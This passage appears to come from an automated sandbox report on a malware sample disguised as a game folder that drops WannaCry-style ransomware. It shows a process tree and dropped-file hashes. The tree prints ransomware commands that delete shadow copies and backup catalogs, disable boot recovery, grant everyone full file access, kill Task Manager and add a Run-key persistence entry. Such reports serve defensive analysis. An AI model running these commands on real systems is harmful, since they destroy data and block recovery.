                                                                                                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\annoy.vbs"
                                                                                                            4⤵
                                                                                                              PID:2984
                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                              taskkill /f /im taskmgr.exe
                                                                                                              4⤵
                                                                                                              • Kills process with taskkill
                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                              PID:1092
                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                              taskkill /f /im regedit.exe
                                                                                                              4⤵
                                                                                                              • Kills process with taskkill
                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                              PID:2024
                                                                                                            • C:\Windows\SysWOW64\WScript.exe
                                                                                                              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\annoy2.vbs"
                                                                                                              4⤵
                                                                                                                PID:2708
                                                                                                              • C:\Windows\SysWOW64\WScript.exe
                                                                                                                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\annoy.vbs"
                                                                                                                4⤵
                                                                                                                  PID:2076
                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                  taskkill /f /im taskmgr.exe
                                                                                                                  4⤵
                                                                                                                  • Kills process with taskkill
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                  PID:1584
                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                  taskkill /f /im regedit.exe
                                                                                                                  4⤵
                                                                                                                  • Kills process with taskkill
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                  PID:2900
                                                                                                                • C:\Windows\SysWOW64\WScript.exe
                                                                                                                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\annoy2.vbs"
                                                                                                                  4⤵
                                                                                                                    PID:2368
                                                                                                                  • C:\Windows\SysWOW64\WScript.exe
                                                                                                                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\annoy.vbs"
                                                                                                                    4⤵
                                                                                                                      PID:1904
                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                      taskkill /f /im taskmgr.exe
                                                                                                                      4⤵
                                                                                                                      • Kills process with taskkill
                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                      PID:588
                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                      taskkill /f /im regedit.exe
                                                                                                                      4⤵
                                                                                                                      • Kills process with taskkill
                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                      PID:2580
                                                                                                                    • C:\Windows\SysWOW64\WScript.exe
                                                                                                                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\annoy2.vbs"
                                                                                                                      4⤵
                                                                                                                        PID:3032
                                                                                                                      • C:\Windows\SysWOW64\WScript.exe
                                                                                                                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\annoy.vbs"
                                                                                                                        4⤵
                                                                                                                          PID:2504
                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                          taskkill /f /im taskmgr.exe
                                                                                                                          4⤵
                                                                                                                          • Kills process with taskkill
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:2788
                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                          taskkill /f /im regedit.exe
                                                                                                                          4⤵
                                                                                                                          • Kills process with taskkill
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:1668
                                                                                                                        • C:\Windows\SysWOW64\WScript.exe
                                                                                                                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\annoy2.vbs"
                                                                                                                          4⤵
                                                                                                                            PID:348
                                                                                                                          • C:\Windows\SysWOW64\WScript.exe
                                                                                                                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\annoy.vbs"
                                                                                                                            4⤵
                                                                                                                              PID:1556
                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                              taskkill /f /im taskmgr.exe
                                                                                                                              4⤵
                                                                                                                              • Kills process with taskkill
                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                              PID:1216
                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                              taskkill /f /im regedit.exe
                                                                                                                              4⤵
                                                                                                                              • Kills process with taskkill
                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                              PID:2592
                                                                                                                            • C:\Windows\SysWOW64\WScript.exe
                                                                                                                              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\annoy2.vbs"
                                                                                                                              4⤵
                                                                                                                                PID:1092
                                                                                                                              • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\annoy.vbs"
                                                                                                                                4⤵
                                                                                                                                  PID:2008
                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                  taskkill /f /im taskmgr.exe
                                                                                                                                  4⤵
                                                                                                                                  • Kills process with taskkill
                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                  PID:2432
                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                  taskkill /f /im regedit.exe
                                                                                                                                  4⤵
                                                                                                                                  • Kills process with taskkill
                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                  PID:1704
                                                                                                                                • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\annoy2.vbs"
                                                                                                                                  4⤵
                                                                                                                                    PID:1568
                                                                                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                  timeout 5
                                                                                                                                  3⤵
                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                  PID:2564
                                                                                                                                • C:\Windows\SysWOW64\shutdown.exe
                                                                                                                                  shutdown /a
                                                                                                                                  3⤵
                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                  PID:1072
                                                                                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                  timeout 2
                                                                                                                                  3⤵
                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                  PID:1672
                                                                                                                                • C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\win7recovery.exe
                                                                                                                                  win7recovery.exe
                                                                                                                                  3⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Loads dropped DLL
                                                                                                                                  • Adds Run key to start application
                                                                                                                                  • Modifies Internet Explorer settings
                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                                  • System policy modification
                                                                                                                                  PID:2428
                                                                                                                                  • C:\ProgramData\WbVhxCIDDK.exe
                                                                                                                                    "C:\ProgramData\WbVhxCIDDK.exe"
                                                                                                                                    4⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                    PID:1488
                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                  taskkill /f /im WScript.exe
                                                                                                                                  3⤵
                                                                                                                                  • Kills process with taskkill
                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                  PID:2104
                                                                                                                                • C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\wannacryptor.exe
                                                                                                                                  wannacryptor.exe
                                                                                                                                  3⤵
                                                                                                                                  • Drops startup file
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Loads dropped DLL
                                                                                                                                  • Sets desktop wallpaper using registry
                                                                                                                                  PID:1128
                                                                                                                                  • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                    attrib +h .
                                                                                                                                    4⤵
                                                                                                                                    • Views/modifies file attributes
                                                                                                                                    PID:2236
                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                    icacls . /grant Everyone:F /T /C /Q
                                                                                                                                    4⤵
                                                                                                                                    • Modifies file permissions
                                                                                                                                    PID:1840
                                                                                                                                  • C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\taskdl.exe
                                                                                                                                    taskdl.exe
                                                                                                                                    4⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    PID:2272
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    cmd /c 249171721041788.bat
                                                                                                                                    4⤵
                                                                                                                                      PID:1836
                                                                                                                                      • C:\Windows\SysWOW64\cscript.exe
                                                                                                                                        cscript.exe //nologo m.vbs
                                                                                                                                        5⤵
                                                                                                                                        • Loads dropped DLL
                                                                                                                                        PID:2768
                                                                                                                                    • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                      attrib +h +s F:\$RECYCLE
                                                                                                                                      4⤵
                                                                                                                                      • Views/modifies file attributes
                                                                                                                                      PID:1636
                                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\@[email protected]
                                                                                                                                      4⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Loads dropped DLL
                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                      PID:2092
                                                                                                                                      • C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\TaskData\Tor\taskhsvc.exe
                                                                                                                                        TaskData\Tor\taskhsvc.exe
                                                                                                                                        5⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Loads dropped DLL
                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                        PID:1920
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      cmd.exe /c start /b @[email protected] vs
                                                                                                                                      4⤵
                                                                                                                                      • Loads dropped DLL
                                                                                                                                      PID:2976
                                                                                                                                      • C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\@[email protected]
                                                                                                                                        5⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                        PID:1392
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                                                                                                                                          6⤵
                                                                                                                                            PID:1580
                                                                                                                                            • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                                                              vssadmin delete shadows /all /quiet
                                                                                                                                              7⤵
                                                                                                                                              • Interacts with shadow copies
                                                                                                                                              PID:1928
                                                                                                                                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                              wmic shadowcopy delete
                                                                                                                                              7⤵
                                                                                                                                                PID:2356
                                                                                                                                        • C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\@[email protected]
                                                                                                                                          4⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          • Sets desktop wallpaper using registry
                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                          PID:1712
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "jbkztwfuwyz578" /t REG_SZ /d "\"C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\tasksche.exe\"" /f
                                                                                                                                          4⤵
                                                                                                                                            PID:2900
                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                              reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "jbkztwfuwyz578" /t REG_SZ /d "\"C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\tasksche.exe\"" /f
                                                                                                                                              5⤵
                                                                                                                                              • Adds Run key to start application
                                                                                                                                              • Modifies registry key
                                                                                                                                              PID:464
                                                                                                                                        • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                          timeout 12
                                                                                                                                          3⤵
                                                                                                                                          • Delays execution with timeout.exe
                                                                                                                                          PID:2852
                                                                                                                                    • C:\Windows\system32\vssvc.exe
                                                                                                                                      C:\Windows\system32\vssvc.exe
                                                                                                                                      1⤵
                                                                                                                                        PID:3060

                                                                                                                                      Network

                                                                                                                                      MITRE ATT&CK Enterprise v15

                                                                                                                                      Replay Monitor

                                                                                                                                      Loading Replay Monitor...

                                                                                                                                      Downloads

                                                                                                                                      • C:\ProgramData\Microsoft\User Account Pictures\@[email protected]

                                                                                                                                        Filesize

                                                                                                                                        681B

                                                                                                                                        MD5

                                                                                                                                        33355a2ffdb0d76bca3b109ff78452fc

                                                                                                                                        SHA1

                                                                                                                                        e35a32937c5572f57960ef007b4b3d3b9237aa10

                                                                                                                                        SHA256

                                                                                                                                        9d99e71c281c85e4e278de74cc9b72202349302a861362f4aef660787d83edf3

                                                                                                                                        SHA512

                                                                                                                                        70832db585d777b977b87ed40c0cf8fc630429751f6dc9082de486854d546a121435fca42379ce32ccbeaad925139dfff8c5234a46b905dad325c46f062fe033

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Adobe_Flash_Player.exe

                                                                                                                                        Filesize

                                                                                                                                        114B

                                                                                                                                        MD5

                                                                                                                                        d725d85cc5f30c0f695b03a9e7d0c4c0

                                                                                                                                        SHA1

                                                                                                                                        131b68adcddb7ff3b3ce9c34c5277eb5d673f610

                                                                                                                                        SHA256

                                                                                                                                        4d4588c42fa8df0ea45ad48aca4511bb4286f0deaa41fdf188c3b7ab9e1b698a

                                                                                                                                        SHA512

                                                                                                                                        01f270a15aa10e60e14ac140ccb54e38cf8e57833ef1c0db7d36688a93ecdc0a59ecf9ead9366a5920faac7e28a2e0ee03759eb0fa92d455abc72f406fe8775b

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-IR167.tmp\walliant.tmp

                                                                                                                                        Filesize

                                                                                                                                        2.5MB

                                                                                                                                        MD5

                                                                                                                                        62e5dbc52010c304c82ada0ac564eff9

                                                                                                                                        SHA1

                                                                                                                                        d911cb02fdaf79e7c35b863699d21ee7a0514116

                                                                                                                                        SHA256

                                                                                                                                        bd54ad7a25594dc823572d9b23a3490ff6b8b1742a75e368d110421ab08909b2

                                                                                                                                        SHA512

                                                                                                                                        b5d863ea38816c18f7778ef12ea4168ceb0dae67704c0d1d4a60b0237ca6e758c1dfc5c28d4fc9679b0159de25e56d5dfff8addacd7a9c52572674d90c424946

                                                                                                                                      • C:\Users\Admin\AppData\Roaming\tor\cached-microdescs.new

                                                                                                                                        Filesize

                                                                                                                                        6.3MB

                                                                                                                                        MD5

                                                                                                                                        192cafd796713b3f37a4ba15911a1949

                                                                                                                                        SHA1

                                                                                                                                        fac57bc1731d4435aefcea478f4c0a9fb21eed03

                                                                                                                                        SHA256

                                                                                                                                        d1707b9d726edb3d53d235ce3c213671d976e7c33579140c607cb9c2f771cdff

                                                                                                                                        SHA512

                                                                                                                                        b014463f8204b61f36ead7228aebaf5b1125cf2aada95dfaecad90fbabbd672eebb129f49cf8ba8a07059995a1b004956fef5d864c6498aa08a68ff5917667ff

                                                                                                                                      • C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\249171721041788.bat

                                                                                                                                        Filesize

                                                                                                                                        412B

                                                                                                                                        MD5

                                                                                                                                        43a0fb97ad3b9385d329f597f1fbf399

                                                                                                                                        SHA1

                                                                                                                                        e5eda655874786dad0b02a34f9dd7fe261eea707

                                                                                                                                        SHA256

                                                                                                                                        b3b75f2f213cc7c9b4362ae1bebc8dd6f407715c40a78c4c113ad536766545f8

                                                                                                                                        SHA512

                                                                                                                                        d788bdb188dbb957fc2ef5268cf1f9c4c0ee10e5d5d878c90c57b4c2430c6ac388879f7ed6c04408bd01d369d49e8dad5fdacee06920881db5500db705f9a2df

                                                                                                                                      • C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\@[email protected]

                                                                                                                                        Filesize

                                                                                                                                        933B

                                                                                                                                        MD5

                                                                                                                                        f97d2e6f8d820dbd3b66f21137de4f09

                                                                                                                                        SHA1

                                                                                                                                        596799b75b5d60aa9cd45646f68e9c0bd06df252

                                                                                                                                        SHA256

                                                                                                                                        0e5ece918132a2b1a190906e74becb8e4ced36eec9f9d1c70f5da72ac4c6b92a

                                                                                                                                        SHA512

                                                                                                                                        efda21d83464a6a32fdeef93152ffd32a648130754fdd3635f7ff61cc1664f7fc050900f0f871b0ddd3a3846222bf62ab5df8eed42610a76be66fff5f7b4c4c0

                                                                                                                                      • C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\AxInterop.ShockwaveFlashObjects.dll

                                                                                                                                        Filesize

                                                                                                                                        17KB

                                                                                                                                        MD5

                                                                                                                                        451112d955af4fe3c0d00f303d811d20

                                                                                                                                        SHA1

                                                                                                                                        1619c35078ba891091de6444099a69ef364e0c10

                                                                                                                                        SHA256

                                                                                                                                        0d57a706d4e10cca3aed49b341a651f29046f5ef1328878d616be93c3b4cbce9

                                                                                                                                        SHA512

                                                                                                                                        35357d2c4b8229ef9927fa37d85e22f3ae26606f577c4c4655b2126f0ecea4c69dae03043927207ca426cc3cd54fc3e72124369418932e04733a368c9316cf87

                                                                                                                                      • C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\IMPORTANT.txt

                                                                                                                                        Filesize

                                                                                                                                        273B

                                                                                                                                        MD5

                                                                                                                                        c538506cae8330844fd21a05f2d065aa

                                                                                                                                        SHA1

                                                                                                                                        02534de70d8ac6b5b700456a6f90b8f3b72b3cc0

                                                                                                                                        SHA256

                                                                                                                                        20cd2cf85675a5cfdcba4d355df959d71a9e1944888a7ecea7e3f7a16e8adbf9

                                                                                                                                        SHA512

                                                                                                                                        a2d8070c569d4e4091adc85d570603b0400aedac3da2fd3e18ee588d72b12f1183d27f205ada0fb74e004e89415274fa27e84574f498e2315132c91495fae123

                                                                                                                                      • C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\Interop.ShockwaveFlashObjects.dll

                                                                                                                                        Filesize

                                                                                                                                        21KB

                                                                                                                                        MD5

                                                                                                                                        e869d1d4545c212d9068a090a370ded3

                                                                                                                                        SHA1

                                                                                                                                        a6a92f108bba390cd14e7103ba710efec1d270f9

                                                                                                                                        SHA256

                                                                                                                                        63af704211a03f6ff6530ebfca095b6c97636ab66e5a6de80d167b19c3c30c66

                                                                                                                                        SHA512

                                                                                                                                        ee108b0ebefb476c5beb568129da7ce058229fb42ad3500c6fc37a36d718eb67a17b331d73f6920a5290c3977be2eda96aa057533c3344898d161cb464c6ef76

                                                                                                                                      • C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\TaskData\Tor\taskhsvc.exe

                                                                                                                                        Filesize

                                                                                                                                        3.0MB

                                                                                                                                        MD5

                                                                                                                                        fe7eb54691ad6e6af77f8a9a0b6de26d

                                                                                                                                        SHA1

                                                                                                                                        53912d33bec3375153b7e4e68b78d66dab62671a

                                                                                                                                        SHA256

                                                                                                                                        e48673680746fbe027e8982f62a83c298d6fb46ad9243de8e79b7e5a24dcd4eb

                                                                                                                                        SHA512

                                                                                                                                        8ac6dc5bb016afc869fcbb713f6a14d3692e866b94f4f1ee83b09a7506a8cb58768bd47e081cf6e97b2dacf9f9a6a8ca240d7d20d0b67dbd33238cc861deae8f

                                                                                                                                      • C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\YFGA.bat

                                                                                                                                        Filesize

                                                                                                                                        1KB

                                                                                                                                        MD5

                                                                                                                                        ccbc42c8f2ef7f9b47e8c35262774afe

                                                                                                                                        SHA1

                                                                                                                                        4f588f963b41eb2fd5200e4d55e9eae9984a5746

                                                                                                                                        SHA256

                                                                                                                                        aea7b8fa2384a4fe733a67ac69436a65a4d33bc3de2d7cb6a4fb19f64f8585b5

                                                                                                                                        SHA512

                                                                                                                                        494ad8f4dad760717ba4ad351842d70314f8c2da4d96ddf36c854b3b4b12493dfe48a8f07816ffab755ede68ae5e02565396287c5c1b9b9eb0b1bccd11ae1ea0

                                                                                                                                      • C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\annoy.vbs

                                                                                                                                        Filesize

                                                                                                                                        50B

                                                                                                                                        MD5

                                                                                                                                        3167d161336cbd296dc579d2295b0f22

                                                                                                                                        SHA1

                                                                                                                                        53253e5841e6a7a7a1b8bd08378af0a96b2f9a98

                                                                                                                                        SHA256

                                                                                                                                        307879bf0d9bec07bab240b5010434801fbee520c99c5a617e8ac630f42dde80

                                                                                                                                        SHA512

                                                                                                                                        62af8fa0c9a30ec6aa9b552fcac1879af1f00f5ceb48a77718b2a8e042e3524e2cd299f26fcde31ad8abf2dcb94d15cf45ecbce0bd5f9f93f44aca6327aa53ea

                                                                                                                                      • C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\annoy2.vbs

                                                                                                                                        Filesize

                                                                                                                                        44B

                                                                                                                                        MD5

                                                                                                                                        9a2ccbd3e2f1a2382fed7674c28dd086

                                                                                                                                        SHA1

                                                                                                                                        b466bdd2079575c938de65285f02739143ecb170

                                                                                                                                        SHA256

                                                                                                                                        4519cd5997afce27129ef943f121972f7b0b34aa018e4dd408892fc5c39bb59e

                                                                                                                                        SHA512

                                                                                                                                        8929493211c17a8e99b908a8305dbebe2d96e1b54426e89ddba84c2010a86d7f6d0983080f29fa1ab7a0687d536c0546278b9fffe4560d84e4012f243f344d78

                                                                                                                                      • C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\annoy3.vbs

                                                                                                                                        Filesize

                                                                                                                                        56B

                                                                                                                                        MD5

                                                                                                                                        19cf22e8d63e787913b6617542211e19

                                                                                                                                        SHA1

                                                                                                                                        8c3d2f43025e5c4ef70e0c4d1f36692361f51b1f

                                                                                                                                        SHA256

                                                                                                                                        dbec312d736f8a56f94ace99986d95d4355ef644a2fd908da1ff4c8b0a003979

                                                                                                                                        SHA512

                                                                                                                                        8b9d192dd7f175e63aebcdfc8426876fa8bf3ae00d3cf10bb8fcf0d0c262b906de28784f5b97141f656e87bb548d343b8d5a127c06ecb407289e91f3fc199608

                                                                                                                                      • C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\b.wnry

                                                                                                                                        Filesize

                                                                                                                                        1.4MB

                                                                                                                                        MD5

                                                                                                                                        c17170262312f3be7027bc2ca825bf0c

                                                                                                                                        SHA1

                                                                                                                                        f19eceda82973239a1fdc5826bce7691e5dcb4fb

                                                                                                                                        SHA256

                                                                                                                                        d5e0e8694ddc0548d8e6b87c83d50f4ab85c1debadb106d6a6a794c3e746f4fa

                                                                                                                                        SHA512

                                                                                                                                        c6160fd03ad659c8dd9cf2a83f9fdcd34f2db4f8f27f33c5afd52aced49dfa9ce4909211c221a0479dbbb6e6c985385557c495fc04d3400ff21a0fbbae42ee7c

                                                                                                                                      • C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\bloatware\OperaSetup.exe

                                                                                                                                        Filesize

                                                                                                                                        2.0MB

                                                                                                                                        MD5

                                                                                                                                        2d183522f195d563fe2a732363b8f757

                                                                                                                                        SHA1

                                                                                                                                        8b4ba6716e8e635b2b35ee64134784c788fa1b0e

                                                                                                                                        SHA256

                                                                                                                                        4b6d2615f53454076b996a91473287e5fc882ce266933cfbe815a63477ed8407

                                                                                                                                        SHA512

                                                                                                                                        2c37e38214ed90d21345a8675424cfe3086cce34acd19972081479946c541b747b97cc722910189f9b5e7e8bcd56de0b2326407b3008de6763c40366ceffc67b

                                                                                                                                      • C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\bloatware\bewidgets.exe

                                                                                                                                        Filesize

                                                                                                                                        843KB

                                                                                                                                        MD5

                                                                                                                                        ff508ab78289efa35e67a05d6cc20717

                                                                                                                                        SHA1

                                                                                                                                        174f616661b53371fe93fa5cc4ec4b6e233abb43

                                                                                                                                        SHA256

                                                                                                                                        eca41ee73faaa7e85ecf4d4c6d4df0e078c36c6554f25142b5e68b2b6cf68272

                                                                                                                                        SHA512

                                                                                                                                        f94fd558e34589c8b0f3da7d20bbb404c4dc6e560aabc5f7e702cdf6a6b8a7870d63d8fb667f6324461ed37c32f6ff8abb0cee65317c6ad745e61c1fc7c80811

                                                                                                                                      • C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\bloatware\bloatware.cmd

                                                                                                                                        Filesize

                                                                                                                                        140B

                                                                                                                                        MD5

                                                                                                                                        85960c66edf9a8db4e5a17d9f15b6ae3

                                                                                                                                        SHA1

                                                                                                                                        fb27f19a4e8f55dc2c77d7570d472e8df801531b

                                                                                                                                        SHA256

                                                                                                                                        81a20f21135c05252a3dd2042ff39bf044624c79f6d9ec9fd412a8c9b38d83a3

                                                                                                                                        SHA512

                                                                                                                                        c8b81cb4901039c5ac26bbf2e98b40db60bfd6ab37d7abbc030d1ba11f78485a148935539c09c2cb5c983f14d66b0fdd9d49c138a1340690b2aa69de35d4975f

                                                                                                                                      • C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\bloatware\fontcreator.exe

                                                                                                                                        Filesize

                                                                                                                                        25.2MB

                                                                                                                                        MD5

                                                                                                                                        14cebb6187a53864094293d616e9af4d

                                                                                                                                        SHA1

                                                                                                                                        47b89d897f432002520fb4a9c0c862df45257d36

                                                                                                                                        SHA256

                                                                                                                                        1e3cf9b81993ca63c3da99c4ec29d8826d5ac65be4088b4e4fd52f11224be96c

                                                                                                                                        SHA512

                                                                                                                                        f4bc7cb3f602ac686485ee5b23a856b49ce3e3b73325cc520a728a723d014785f2091905f676312ee7826740f184b074458a31018d3c7d27a6ce2a219643195a

                                                                                                                                      • C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\bloatware\iconchanger.exe

                                                                                                                                        Filesize

                                                                                                                                        1.1MB

                                                                                                                                        MD5

                                                                                                                                        3b89914c7bfe5487af38f7bd8dc31bb5

                                                                                                                                        SHA1

                                                                                                                                        7204cce974e02495f58731e961e4cdc49a2f1ef3

                                                                                                                                        SHA256

                                                                                                                                        14068d0948dfeedc5908573fcaa2704536faa8b0fbea8caac61b9fb264cc204d

                                                                                                                                        SHA512

                                                                                                                                        73735b965a0c948a4126bad31ea54fb4aa31b2c8877ab772f7596a27e821be9f6bba17ddbb9f4e87c6c70bba93375277008e4fa354bf1504e1cd2b9b190d45f8

                                                                                                                                      • C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\bloatware\pixelsee.exe

                                                                                                                                        Filesize

                                                                                                                                        4.8MB

                                                                                                                                        MD5

                                                                                                                                        39490d6ae5b10a8cdffecd71d05141dd

                                                                                                                                        SHA1

                                                                                                                                        450da6260c6817aca8d9444831a48439ba45785c

                                                                                                                                        SHA256

                                                                                                                                        a9427d47bf1cfadd009990ca09feb2af88823f5908b17e2afa70c8c49c95b3eb

                                                                                                                                        SHA512

                                                                                                                                        7ffb9cb6a53cf233b6ff396eeb6193e683aed75001b3f73a1bbadaeec3ff7dcbce9b7e215d1743a4374e488185b824b90dde4afe93a8d93608b6340af07c14fb

                                                                                                                                      • C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\bloatware\qtranslate.exe

                                                                                                                                        Filesize

                                                                                                                                        908KB

                                                                                                                                        MD5

                                                                                                                                        e23ffecb44c814aaa4708d56ab5b144b

                                                                                                                                        SHA1

                                                                                                                                        202311d615685e7baaa41dc149b5a76a69c05a0e

                                                                                                                                        SHA256

                                                                                                                                        d395af3c10e18c944cf8ade76a650623dc23e050eaf652ff31056c84077a013c

                                                                                                                                        SHA512

                                                                                                                                        4ae915fb4cb00e30a215ddd439c6e254fb49ce15c4d53000fb12a0cbf5f68820bc7dca6b840a620351060101c6995fd9429ea91f9682503f01ec001f213cfdc3

                                                                                                                                      • C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\c.wnry

                                                                                                                                        Filesize

                                                                                                                                        780B

                                                                                                                                        MD5

